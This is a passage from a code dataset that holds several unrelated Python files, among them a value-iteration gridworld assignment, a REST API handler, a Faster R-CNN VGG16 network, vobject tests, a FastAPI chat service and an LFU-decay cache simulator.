cmap = plt.cm.Blues\n norm = plt.Normalize(np.min(values), np.max(values))\n rgba = cmap(norm(values))\n\n rgba[12, 48] = 1.0, 0.0, 0.0, 1.0\n\n for i in range(0, 25):\n for j in range(0, 50):\n if(not isValid(j, i)):\n rgba[i][j] = 0.0, 0.0, 0.0, 1.0\n\n fig, ax = plt.subplots(figsize=(15,15))\n im = ax.imshow(rgba, interpolation = 'nearest')\n ax.set_ylim(ax.get_ylim()[::-1])\n #print(np.min(values), np.max(values))\n\n if(flag):\n for i in range(0, 25):\n for j in range(0, 50):\n if(not isValid(j, i)):\n continue\n\n num = int(policy[i][j])\n text = ''\n if(num == 1): text = 'L'\n elif(num == 2): text = 'U'\n elif(num == 3): text = 'R'\n else: text = 'D'\n color = 'red'\n if(i == 12 and j == 48): color = 'black'\n text = ax.text(j, i, text, ha = 'center', va = 'center', color = 'black', size = 'small')\n\n plt.axis('on')\n\n for i in range(1, 26, 1):\n ax.axhline(i - 0.5, color = 'gray', linewidth = 0.4)\n \n for i in range(1, 51, 1):\n ax.axvline(i - 0.5, color = 'gray', linewidth = 0.4)\n\n if(title): ax.set_title(title)\n\n if(fileName):\n plt.savefig(fileName)\n plt.close()\n \n plt.show()\n\n# %% [markdown]\n# ## Part a - Value Iteration \n# #### → Intial values for all possible states is 0\n# #### → Action 1 means left, Action 2 means up, Aciton 3 means right, Action 4 means down\n# %% [markdown]\n# #### This function determines if the state is valid or a wall\n\n# %%\ndef isValid(i, j):\n if(i == 0 or j == 0 or i == 49 or j == 24): return False\n if(i == 25 or i == 26):\n if(j <= 11 or j >= 13): return False\n return True\n\n# %% [markdown]\n# #### This function gets the reward given a state and an action \n\n# %%\ndef reward(i, j, action, values, goalState, gamma, step):\n\n ans = 0\n\n if(action == 1):\n ans += 0.8 * rewardHelper(i - 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j + 1, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i + 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j - 1, values, gamma, step, goalState, i, j)\n if(action == 2):\n ans += (0.2 / 3) * rewardHelper(i - 1, j, values, gamma, step, goalState, i, j)\n ans += 0.8 * rewardHelper(i , j + 1, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i + 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j - 1, values, gamma, step, goalState, i, j)\n if(action == 3):\n ans += (0.2 / 3) * rewardHelper(i - 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j + 1, values, gamma, step, goalState, i, j)\n ans += 0.8 * rewardHelper(i + 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j - 1, values, gamma, step, goalState, i, j)\n if(action == 4):\n ans += (0.2 / 3) * rewardHelper(i - 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j + 1, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i + 1, j, values, gamma, step, goalState, i, j)\n ans += 0.8 * rewardHelper(i , j - 1, values, gamma, step, goalState, i, j)\n return ans\n\n\n# %%\ndef rewardHelper(i, j, values, gamma, step, goalState, posX, posY):\n x = goalState[0]\n y = goalState[1]\n ans = 0\n if(i == x and j == y):\n ans += 100\n if(not isValid(i, j)): \n \n if(posX == x and posY == y): \n ans += 100\n ans += gamma * values[posX][posY][step - 1]\n else:\n ans -= 1\n ans += gamma * values[posX][posY][step - 1]\n \n else: ans += gamma * values[i][j][step - 1]\n\n return ans\n\n\n# %%\ndef valueIteration(gamma, theta, goalState, values, policies, maxNorm, toConverge):\n\n for step in range(1, values.shape[2]):\n\n change = -1\n\n for i in range(0, 50):\n for j in range(0, 25):\n #Check if this is a wall or not\n if(not isValid(i, j)): continue #Is a wall\n \n maxValue = -np.Inf\n actionTaken = 0\n #Taking max after considering every action as intended action\n for action in range(1, 5):\n curr = reward(i, j, action, values, goalState, gamma, step) # expected reward using this action as the intended action\n #print('reward for action', action, 'at step', step, 'for state', i, j, 'is', curr)\n if(curr > maxValue):\n maxValue = curr\n actionTaken = action\n #if(step == 4):\n #print('changing action for state ', i, j, 'new max value', maxValue, 'new action', actionTaken)\n \n values[i][j][step] = maxValue\n\n #print('values at step ', step, i, j, maxValue)\n change = max(abs(maxValue - values[i][j][step - 1]), change) #calculate the change\n\n policies[i][j][step - 1] = actionTaken\n\n #print('maxNorm at step', step, 'is', change)\n if(change < theta and toConverge): \n #print('converged at step', step, 'max change', change)\n break # converged\n maxNorm[step - 1] = change\n \n return values, policies\n\n# %% [markdown]\n# #### Run the function for the values given in the assignment\n\n# %%\niter = 100 #max iterations if not converging\nvalues = np.zeros((50, 25, iter + 1))\npolicies = np.zeros((50, 25, iter))\nmaxNorm = np.zeros((iter))\n\nvalues, policies = valueIteration(0.1, 0.1, (48, 12), values, policies, maxNorm, False)\n\nmat1 = np.zeros((25, 50))\nmat2 = np.zeros((25, 50))\n\nfor i in range(0, 50):\n for j in range(0, 25):\n mat1[j][i] = values[i][j][4]\n mat2[j][i] = policies[i][j][3]\n\nplot(mat1, mat2, (48, 12), True, None, 'Anything')\n#for step in range(0, iter + 1):\n# for i in range(0, 50):\n# for j in range(0, 25):\n# print('values at step ', step, i, j, values[i][j][step])\n \n\n#print(values.shape)\n#plot(values[:][:][iter], policies[:][:][iter - 1], (48, 12))\n#np.set_printoptions(threshold=np.inf)\n\n# %% [markdown]\n# ## Part b - Plot the value function at different iterations\n\n# %%\niter = 1000 #max iterations if not converging\nvaluesNew = np.zeros((50, 25, iter + 1))\npoliciesNew = np.zeros((50, 25, iter))\nmaxNormNew = np.zeros((iter))\n\nvaluesNew, policiesNew = valueIteration(0.99, 0.1, (48, 12), valuesNew, policiesNew, maxNormNew, True)\n\nreqIteration = np.array([20, 50, 100])\n\nfor x in reqIteration:\n mat1 = np.zeros((25, 50))\n mat2 = np.zeros((25, 50))\n\n for i in range(0, 50):\n for j in range(0, 25):\n mat1[j][i] = valuesNew[i][j][x]\n mat2[j][i] = policiesNew[i][j][x - 1]\n\n plot(mat1, mat2, (48, 12), True)\n\n# %% [markdown]\n# ## Part c - Sample execution using the policy\n# %% [markdown]\n# #### Function to move the agent based on the intended action\n\n# %%\ndef move(currState, action):\n num = random.uniform(0.0, 1.0)\n newStateX = -5\n newStateY = -5\n\n if(action == 1):\n if(num <= 0.8): newStateX = currState[0] - 1\n elif(num <= 0.8 + 0.2 / 3): newStateY = currState[1] + 1\n elif(num <= 1.0 - 0.2 / 3): newStateX = currState[0] + 1\n else: newStateY = currState[1] - 1\n if(action == 2):\n if(num <= 0.8): newStateY = currState[1] + 1\n elif(num <= 0.8 + 0.2 / 3): newStateX = currState[0] - 1\n elif(num <= 1.0 - 0.2 / 3): newStateX = currState[0] + 1\n else: newStateY = currState[1] - 1\n if(action == 3):\n if(num <= 0.8): newStateX = currState[0] + 1\n elif(num <= 0.8 + 0.2 / 3): newStateY = currState[1] + 1\n elif(num <= 1.0 - 0.2 / 3): newStateX = currState[0] - 1\n else: newStateY = currState[1] - 1\n if(action == 4):\n if(num <= 0.8): newStateY = currState[1] - 1\n elif(num <= 0.8 + 0.2 / 3): newStateY = currState[1] + 1\n elif(num <= 1.0 - 0.2 / 3): newStateX = currState[0] + 1\n else: newStateX = currState[0] - 1\n \n if(newStateX == -5): newStateX = currState[0]\n if(newStateY == -5): newStateY = currState[1]\n\n if(not isValid(newStateX, newStateY)): return currState\n else: return (newStateX, newStateY)\n\n# %% [markdown]\n# #### Move the agent and get the counts for each state visitation\n\n# %%\npolicy = np.zeros((50, 25))\n#policy = policiesNew[:][:][policiesNew.shape[2] - 1].copy()\nfor i in range(0, 50):\n for j in range(0, 25):\n policy[i][j] = policiesNew[i][j][661]\n\nfor episode in range(0, 200):\n count = np.zeros((50, 25))\n currStateX = 1\n currStateY = 1\n\n for step in range(0, 1000):\n newState = move((currStateX, currStateY), policy[currStateX][currStateY])\n count[newState[0]][newState[1]] += 1\n currStateX = newState[0]\n currStateY = newState[1]\n if(currStateX == 48 and currStateY == 12): break\n\n mat1 = np.zeros((25, 50))\n\n for i in range(0, 50):\n for j in range(0, 25):\n mat1[j][i] = count[i][j]\n\n plot(mat1, None, (48, 12), False)\n\n# %% [markdown]\n# ## Part d - Policy convergence\n\n# %%\nstopNew = 0\nstopD = 0\n\niter = 100 #max iterations if not converging\nvaluesD = np.zeros((50, 25, iter + 1))\npoliciesD = np.zeros((50, 25, iter))\nmaxNormD = np.zeros((iter))\n\nvaluesD, policiesD = valueIteration(0.01, 0.1, (48, 12), valuesD, policiesD, maxNormD, False)\n\nfor step in range(1, policiesD.shape[2]):\n \n flag = False\n\n for i in range(0, 50):\n for j in range(0, 25):\n if(not isValid(i, j)): continue\n if(policiesD[i][j][step] != policiesD[i][j][99]):\n flag = True\n break\n \n if(flag): break\n if(not flag): \n stopD = step\n break\n\nfor step in range(1, policiesNew.shape[2]):\n \n flag = False\n for i in range(0, 50):\n for j in range(0, 25):\n if(not isValid(i, j)): continue\n #print('step is', step, 'state is', i, j, 'curr', policiesNew[i][j][step], 'last', policiesNew[i][j][step - 1])\n if(policiesNew[i][j][step] != policiesNew[i][j][661]):\n flag = True\n break\n if(flag): break\n\n if(not flag): \n stopNew = step\n break\n\nprint('Policy converges at step', stopD, 'for gamma = 0.01')\nprint('Policy converges at step', stopNew, 'for gamma = 0.99')\n\nplt.plot(maxNormNew)\nplt.plot(maxNormD)\n\n\n","sub_path":"A2-PartA-2018EE10435-2018EE10443.py","file_name":"A2-PartA-2018EE10435-2018EE10443.py","file_ext":"py","file_size_in_byte":11010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"220586394","text":"import requests\nimport pandas as pd\nimport funcs_DB\nfrom typing import Dict, Tuple,List\n\nclass Requester:\n \n url='https://api.adsabs.harvard.edu/v1/search/query'\n fields=['title','author','aff','keyword','citation_count','pubdate','author_count','page_count','bibstem']\n \n def __init__(self, token: str,requestName: str):\n self.token = token\n self.headers = {'Authorization': 'Bearer '+token}\n self.db=requestName\n \n def setParams(self,searchCriteria: Tuple,maxRows: int=None):\n self.searchCriteria=searchCriteria\n self.maxRows=maxRows\n self.params=[('fq',q) for q in self.searchCriteria]\n self.params[0]=('q',self.params[0][1])\n self.flags=[('fl',','.join(self.fields))]\n if self.maxRows:\n self.rows=[('rows',str(int(self.maxRows)))]\n else:\n self.rows=[('rows',str(int(2000)))]\n self.params=tuple(self.params+self.flags+self.rows)\n return\n \n def setParamsForRequest(self,startRow: int):\n params = self.params+(('start', str(startRow)),)\n return params\n \n def loadData(self):\n db=funcs_DB.requestDB(self.db)\n startRow=0\n while True:\n params=self.setParamsForRequest(startRow)\n self.response = requests.get(self.url, headers=self.headers, params=params)\n map(db.addRecords,self.response.json()['response']['docs'])\n startRow+=len(self.response.json()['response']['docs'])\n\n if len(self.response.json()['response']['docs'])!=2000:\n break\n return","sub_path":"AdsAbsRequester.py","file_name":"AdsAbsRequester.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"312868811","text":"import json\nimport webapp2\nimport time\n\nimport model\n\n\ndef AsDict(sample):\n return {'id': sample.key.id(), 'name': sample.name, 'description': sample.description, 'concentration': sample.concentration}\n\n\nclass RestHandler(webapp2.RequestHandler):\n\n def dispatch(self):\n time.sleep(1)\n super(RestHandler, self).dispatch()\n\n\n def SendJson(self, r):\n self.response.headers['content-type'] = 'text/plain'\n self.response.write(json.dumps(r))\n \n\nclass QueryHandler(RestHandler):\n\n def get(self):\n samples = model.AllSamples()\n r = [ AsDict(sample) for sample in samples ]\n self.SendJson(r)\n\n\nclass UpdateHandler(RestHandler):\n\n def post(self):\n r = json.loads(self.request.body)\n sample = model.UpdateSample(r['id'], r['name'], r['description'], r['concentration'])\n r = AsDict(sample)\n self.SendJson(r)\n\n\nclass InsertHandler(RestHandler):\n\n def post(self):\n r = json.loads(self.request.body)\n sample = model.InsertSample(r['name'], r['description'], r['concentration'])\n r = AsDict(sample)\n self.SendJson(r)\n\n\nclass DeleteHandler(RestHandler):\n\n def post(self):\n r = json.loads(self.request.body)\n model.DeleteSample(r['id'])\n\n\nAPP = webapp2.WSGIApplication([\n ('/rest/query', QueryHandler),\n ('/rest/insert', InsertHandler),\n ('/rest/delete', DeleteHandler),\n ('/rest/update', UpdateHandler),\n], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"245510557","text":"# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Xinlei Chen\n# --------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.slim import losses\nfrom tensorflow.contrib.slim import arg_scope\nimport numpy as np\n\nfrom nets.network import Network\nfrom model.config import cfg\n\n\nclass vgg16(Network):\n def __init__(self):\n Network.__init__(self)\n self._scope = 'vgg_16'\n\n def _image_to_head(self, is_training, reuse=None):\n with tf.variable_scope(self._scope, self._scope, reuse=reuse):\n net = slim.repeat(self._image, 2, slim.conv2d, 64, [3, 3],\n trainable=False, scope='conv1')\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool1')\n net = slim.repeat(net, 2, slim.conv2d, 128, [3, 3],\n trainable=False, scope='conv2')\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool2')\n net = slim.repeat(net, 3, slim.conv2d, 256, [3, 3],\n trainable=is_training, scope='conv3')\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool3')\n net = slim.repeat(net, 3, slim.conv2d, 512, [3, 3],\n trainable=is_training, scope='conv4')\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool4')\n net = slim.repeat(net, 3, slim.conv2d, 512, [3, 3],\n trainable=is_training, scope='conv5')\n self._layers['head'] = net\n return net\n\n def _head_to_tail(self, pool5, is_training, reuse=None):\n with tf.variable_scope(self._scope, self._scope, reuse=reuse):\n pool5_flat = slim.flatten(pool5, scope='flatten')\n fc6 = slim.fully_connected(pool5_flat, 4096, scope='fc6')\n if is_training:\n fc6 = slim.dropout(fc6, keep_prob=0.5, is_training=True,\n scope='dropout6')\n fc7 = slim.fully_connected(fc6, 4096, scope='fc7')\n if is_training:\n fc7 = slim.dropout(fc7, keep_prob=0.5, is_training=True,\n scope='dropout7')\n return fc7\n\n def get_variables_to_restore(self, variables, var_keep_dic):\n variables_to_restore = []\n\n for v in variables:\n if v.name.split(':')[0] in var_keep_dic:\n print('Variables restored: %s' % v.name)\n variables_to_restore.append(v)\n return variables_to_restore\n","sub_path":"lib_drl/nets/vgg16.py","file_name":"vgg16.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427758344","text":"# ../memory/signature.py\n\n# =============================================================================\n# >> IMPORTS\n# =============================================================================\n# Python Imports\n# Binascii\nfrom binascii import unhexlify\n# OS\nfrom os import name as os_name\nif os_name != 'nt':\n os_name = 'linux'\n# Warnings\nfrom warnings import warn\n\n# Source.Python Imports\nfrom memory_c import Argument\nfrom memory_c import Convention\nfrom memory_c import Return\nfrom core import GAME_NAME\n# Memory\nfrom memory.modules import ModuleData\n\n\n# =============================================================================\n# >> CLASSES\n# =============================================================================\nclass Signature(object):\n '''Class used to call a dynamic function'''\n\n def __init__(self, ini):\n '''Called when the instance is initializes'''\n\n # Get the functions return type\n return_type = getattr(Return, ini['return_type'])\n\n # Get the module for the signature/symbol\n module = ini['module']\n\n # Fix any paths that use $gamename\n module = module.replace('$gamename', GAME_NAME)\n\n # Get the module instance\n module = ModuleData[module]\n\n # Is the server running on Windows?\n if os_name == 'nt':\n\n # Get the hex version of the signature\n func = unhexlify(ini['sig'].replace(' ', ''))\n\n # Is the server not running on Windows?\n else:\n\n # Use the symbol for Linux\n func = ini['symbol']\n\n # Get the address of the function\n address = module.find_address(func)\n\n # Was the function found?\n if not address:\n\n # Raise an error\n raise ValueError('Unable to find address')\n\n # Get the function's arguments\n arguments = ini['arguments']\n\n # Is there only one argument for this function?\n if type(arguments) == str:\n\n # Make a tuple with the argument type\n arguments = tuple([getattr(Argument, arguments)])\n\n # Are there multiple arguments for this function?\n else:\n\n # Get a tuple of the arguments\n arguments = tuple([getattr(Argument, x) for x in arguments])\n\n # Get the convention\n convention = getattr(Convention, ini['convention'])\n\n # Store the function for later use\n self.function = address.make_function(\n convention, arguments, return_type)\n\n def __call__(self, *args):\n '''Call the function with the given arguments'''\n return self.function(*args)\n","sub_path":"addons/source-python/packages/source-python/memory/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"102328229","text":"from rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom . import services\nfrom .serializers import FanSerializer, UnFanSerializer\n\n\nclass LikedMixin:\n @action(detail=True, methods=['POST'])\n def like(self, request, pk=None):\n \"\"\"Лайкает `obj`.\n \"\"\"\n obj = self.get_object()\n services.add_like(obj, request.user)\n return Response()\n\n @action(detail=True, methods=['POST'])\n def unlike(self, request, pk=None):\n \"\"\"Удаляет лайк с `obj`.\n \"\"\"\n obj = self.get_object()\n services.remove_like(obj, request.user)\n return Response()\n\n @action(detail=True, methods=['GET'])\n def fans(self, request, pk=None):\n \"\"\"Получает всех пользователей, которые лайкнули `obj`.\n \"\"\"\n obj = self.get_object()\n fans = services.get_fans(obj)\n serializer = FanSerializer(fans, many=True)\n return Response(serializer.data)\n\n\nclass DislikedMixin:\n @action(detail=True, methods=['POST'])\n def dislike(self, request, pk=None):\n \"\"\"Дизлайкает `obj`.\n \"\"\"\n obj = self.get_object()\n services.add_dislike(obj, request.user)\n return Response()\n\n @action(detail=True, methods=['POST'])\n def undislike(self, request, pk=None):\n \"\"\"Удаляет дизлайк с `obj`.\n \"\"\"\n obj = self.get_object()\n services.remove_dislike(obj, request.user)\n return Response()\n\n @action(detail=True, methods=['GET'])\n def unfans(self, request, pk=None):\n \"\"\"Получает всех пользователей, которые дизлайкнули `obj`.\n \"\"\"\n obj = self.get_object()\n unfans = services.get_unfans(obj)\n serializer = UnFanSerializer(unfans, many=True)\n return Response(serializer.data)\n","sub_path":"likes/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195313427","text":"\"\"\"\nProvides streamlined access to the system console and getting information from the user.\n\"\"\"\n\n\ndef get_bool(prompt):\n \"\"\"\n Prompts the user with a yes/no question.\n\n Args:\n prompt: The prompt presented to the user.\n\n Raises:\n ValueError is raised if the user does not enter 'y', or 'n'.\n\n Returns:\n A boolean value. True if the user enters 'y', False if the user enters 'n'.\n \n Examples:\n >>> fls.console.get_bool(\"Are you a programmer? (y/n): \")\n Are you a programmer?: y\n True\n \n >>> fls.console.get_bool(\"Are you a programmer? (y/n): \")\n Are you a programmer?: n\n False\n\n >>> try:\n ... fls.console.get_bool(\"Are you a programmer? (y/n): \")\n ... except ValueError:\n ... print \"Error!\"\n Are you a programmer?: x\n Error!\n \"\"\"\n user_input = raw_input(prompt)\n if user_input.lower() != 'y' and user_input.lower() !='n':\n raise ValueError\n return True if user_input.lower() == 'y' else False\n\n\ndef get_number(prompt, number_type=int):\n \"\"\"\n Prompts the user to enter a number.\n \n Args:\n prompt: The prompt presented to the user.\n number_type: The type of number. For example, int or float.as_integer_ratio\n\n Raises:\n ValueError is raised if the user doesn't input a number of number_type.\n\n Returns:\n Returns a number of type, number_type.\n \n Examples:\n >>> fls.console.get_number(\"Please enter a number: \", int)\n Please enter a number: 10\n 10\n \n >>> fls.console.get_number(\"Please enter a number: \", float)\n Please enter a number: 1.5\n 1.5\n \n >>> try:\n ... fls.console.get_number(\"Please enter a number: \", int)\n ... except ValueError:\n ... print \"Error!\"\n Please enter a number: This is a string.\n Error!\n \"\"\"\n user_input = raw_input(prompt)\n try:\n return number_type(user_input)\n except ValueError:\n raise ValueError","sub_path":"fls/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"114567194","text":"# -*- coding: utf-8 -*-\n'''\n tests.utils.vobject\n ~~~~~~~~~~~~~~~~\n\n :copyright: (c) 2014 Markus Unterwaditzer & contributors\n :license: MIT, see LICENSE for more details.\n'''\n\nimport pytest\n\nimport vdirsyncer.utils.vobject as vobject\n\nfrom .. import BARE_EVENT_TEMPLATE, EVENT_TEMPLATE, VCARD_TEMPLATE, \\\n normalize_item\n\n_simple_split = [\n VCARD_TEMPLATE.format(r=123),\n VCARD_TEMPLATE.format(r=345),\n VCARD_TEMPLATE.format(r=678)\n]\n\n_simple_joined = u'\\r\\n'.join(\n [u'BEGIN:VADDRESSBOOK'] +\n _simple_split +\n [u'END:VADDRESSBOOK\\r\\n']\n)\n\n\ndef test_split_collection_simple():\n given = list(vobject.split_collection(_simple_joined))\n\n assert [normalize_item(item) for item in given] == \\\n [normalize_item(item) for item in _simple_split]\n\n if vobject.ICALENDAR_ORIGINAL_ORDER_SUPPORT:\n assert [x.splitlines() for x in given] == \\\n [x.splitlines() for x in _simple_split]\n\n\ndef test_split_collection_multiple_wrappers():\n joined = u'\\r\\n'.join(\n u'BEGIN:VADDRESSBOOK\\r\\n' +\n x +\n u'\\r\\nEND:VADDRESSBOOK\\r\\n'\n for x in _simple_split\n )\n given = list(vobject.split_collection(joined))\n\n assert [normalize_item(item) for item in given] == \\\n [normalize_item(item) for item in _simple_split]\n\n if vobject.ICALENDAR_ORIGINAL_ORDER_SUPPORT:\n assert [x.splitlines() for x in given] == \\\n [x.splitlines() for x in _simple_split]\n\n\ndef test_split_collection_different_wrappers():\n with pytest.raises(ValueError) as exc_info:\n list(vobject.split_collection(u'BEGIN:VADDRESSBOOK\\r\\n'\n u'BEGIN:FOO\\r\\n'\n u'END:FOO\\r\\n'\n u'END:VADDRESSBOOK\\r\\n'\n u'BEGIN:VCALENDAR\\r\\n'\n u'BEGIN:FOO\\r\\n'\n u'END:FOO\\r\\n'\n u'END:VCALENDAR\\r\\n'))\n\n assert 'different types of components at top-level' in \\\n str(exc_info.value).lower()\n\n\ndef test_join_collection_simple():\n given = vobject.join_collection(_simple_split)\n assert normalize_item(given) == normalize_item(_simple_joined)\n if vobject.ICALENDAR_ORIGINAL_ORDER_SUPPORT:\n assert given.splitlines() == _simple_joined.splitlines()\n\n\ndef test_split_collection_timezones():\n items = [\n BARE_EVENT_TEMPLATE.format(r=123),\n BARE_EVENT_TEMPLATE.format(r=345)\n ]\n\n timezone = (\n u'BEGIN:VTIMEZONE\\r\\n'\n u'TZID:/mozilla.org/20070129_1/Asia/Tokyo\\r\\n'\n u'X-LIC-LOCATION:Asia/Tokyo\\r\\n'\n u'BEGIN:STANDARD\\r\\n'\n u'TZOFFSETFROM:+0900\\r\\n'\n u'TZOFFSETTO:+0900\\r\\n'\n u'TZNAME:JST\\r\\n'\n u'DTSTART:19700101T000000\\r\\n'\n u'END:STANDARD\\r\\n'\n u'END:VTIMEZONE'\n )\n\n full = u'\\r\\n'.join(\n [u'BEGIN:VCALENDAR'] +\n items +\n [timezone, u'END:VCALENDAR']\n )\n\n given = set(normalize_item(item)\n for item in vobject.split_collection(full))\n expected = set(\n normalize_item(u'\\r\\n'.join((\n u'BEGIN:VCALENDAR', item, timezone, u'END:VCALENDAR'\n )))\n for item in items\n )\n\n assert given == expected\n\n\ndef test_hash_item():\n a = EVENT_TEMPLATE.format(r=1)\n b = u'\\n'.join(line for line in a.splitlines()\n if u'PRODID' not in line and u'VERSION' not in line)\n assert vobject.hash_item(a) == vobject.hash_item(b)\n\n\ndef test_multiline_uid():\n a = (u'BEGIN:FOO\\r\\n'\n u'UID:123456789abcd\\r\\n'\n u' efgh\\r\\n'\n u'END:FOO\\r\\n')\n assert vobject.Item(a).uid == u'123456789abcdefgh'\n\n\ndef test_multiline_uid_complex():\n a = u'''\nBEGIN:VCALENDAR\nBEGIN:VTIMEZONE\nTZID:Europe/Rome\nX-LIC-LOCATION:Europe/Rome\nBEGIN:DAYLIGHT\nTZOFFSETFROM:+0100\nTZOFFSETTO:+0200\nTZNAME:CEST\nDTSTART:19700329T020000\nRRULE:FREQ=YEARLY;BYDAY=-1SU;BYMONTH=3\nEND:DAYLIGHT\nBEGIN:STANDARD\nTZOFFSETFROM:+0200\nTZOFFSETTO:+0100\nTZNAME:CET\nDTSTART:19701025T030000\nRRULE:FREQ=YEARLY;BYDAY=-1SU;BYMONTH=10\nEND:STANDARD\nEND:VTIMEZONE\nBEGIN:VEVENT\nDTSTART:20140124T133000Z\nDTEND:20140124T143000Z\nDTSTAMP:20140612T090652Z\nUID:040000008200E00074C5B7101A82E0080000000050AAABEEF50DCF0100000000000000\n 001000000062548482FA830A46B9EA62114AC9F0EF\nCREATED:20140110T102231Z\nDESCRIPTION:Test.\nLAST-MODIFIED:20140123T095221Z\nLOCATION:25.12.01.51\nSEQUENCE:0\nSTATUS:CONFIRMED\nSUMMARY:Präsentation\nTRANSP:OPAQUE\nEND:VEVENT\nEND:VCALENDAR\n '''.strip()\n assert vobject.Item(a).uid == (u'040000008200E00074C5B7101A82E008000000005'\n u'0AAABEEF50DCF0100000000000000001000000062'\n u'548482FA830A46B9EA62114AC9F0EF')\n","sub_path":"tests/utils/test_vobject.py","file_name":"test_vobject.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38966119","text":"import re\nimport sys\nimport datetime\nfrom pathlib import Path\nfrom decimal import Decimal\nfrom typing import List, Dict\n\nimport uvicorn\nfrom pydantic import BaseModel\nfrom fastapi import FastAPI, Body, Response\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom middleware import LimitUploadSize\nfrom tags_metadata import api_tags_metadata\n\nbase_dir = Path(__file__).parent.parent\nrun_argv = sys.argv[0]\nDEBUG = None\nif run_argv.split('/')[-1] == 'app.py':\n DEBUG = True\nelse:\n DEBUG = False\nif DEBUG:\n app = FastAPI(openapi_tags=api_tags_metadata)\nelse:\n # app = FastAPI(docs_url=None, redoc_url=None, openapi_url=None)\n app = FastAPI(openapi_tags=api_tags_metadata) # 此处采用这种模式是方便部署到云服务器查看 api文档页面\n\n\nclass AddInputList(BaseModel):\n value_array: List[Dict[str, float]]\n\n\nclass ChatMsg(BaseModel):\n msg: str = Body(..., max_length=5 * 1024 * 1024)\n\n\n@app.on_event('startup')\nasync def startup():\n app.add_middleware(\n CORSMiddleware,\n allow_origins=['*'],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=['*'],\n )\n app.add_middleware(LimitUploadSize, max_upload_size=5 * 1024 * 1024) # 限制接口请求数据大小为5M\n\n\n@app.post('/add', tags=['add'])\nasync def add(args: AddInputList, response: Response):\n \"\"\"\"\"\"\n result = Decimal('0')\n for data_item in args.value_array:\n result += Decimal(str(data_item.get('value')))\n return {'result': float(result)}\n\n\n@app.get('/get_date', tags=['get_date'])\nasync def get_date():\n beijing_timezone = datetime.timezone(datetime.timedelta(hours=8))\n beijing_date = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).astimezone(beijing_timezone).date()\n return {'date': beijing_date}\n\n\n@app.post('/chat', tags=['chat'])\nasync def chat(args: ChatMsg):\n # if re.search(r'(?isu)您好.*?再见|再见.*?您好', args.msg): # 长文本性能过差\n # return {'result': '天气不错。'}\n key = 0\n msg_dict = {0: '', 1: '您好,您吃了吗?', 3: '回见了您内。', 4: '天气不错。'}\n if re.search(r'(?isu)您好', args.msg):\n key += 1\n if re.search(r'(?isu)再见', args.msg):\n key += 3\n return {'result': msg_dict[key]}\n\n\ndef main():\n uvicorn.run(app, host=\"0.0.0.0\", port=5000)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"code/api_server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"224748236","text":"import sys\nfrom algorithms.page_replacement_algorithm import page_replacement_algorithm\nfrom lib.disk_struct import Disk\n# sys.path.append(os.path.abspath(\"/home/giuseppe/))\n\n## Keep a LRU list.\n## Page hits:\n## Every time we get a page hit, mark the page and also move it to the MRU position\n## Page faults:\n## Evict an unmark page with the probability proportional to its position in the LRU list.\nclass LFU_DECAY(page_replacement_algorithm):\n\n def __init__(self, N,decay=0.99):\n self.T = Disk(N)\n self.N = N\n self.frequency = {}\n self.decayRate = decay\n \n def get_N(self) :\n return self.N\n\n def getMinValueFromCache(self, values):\n minpage,first = -1, True\n for q in self.T :\n if first or values[q] < values[minpage] :\n minpage,first=q,False\n return minpage\n \n def request(self,page) :\n page_fault = False\n \n if page in self.T :\n page_fault = False\n else :\n #if len(self.T) == self.N :\n if self.T.size() == self.N:\n ## Remove LRU page\n lfu = self.getMinValueFromCache(self.frequency)\n self.T.delete(lfu)\n del self.frequency[lfu]\n \n # Add page to the MRU position\n self.frequency[page] = 0\n self.T.add(page)\n page_fault = True\n \n for q in self.T :\n self.frequency[q] *= self.decayRate\n self.frequency[page] += 1\n \n return 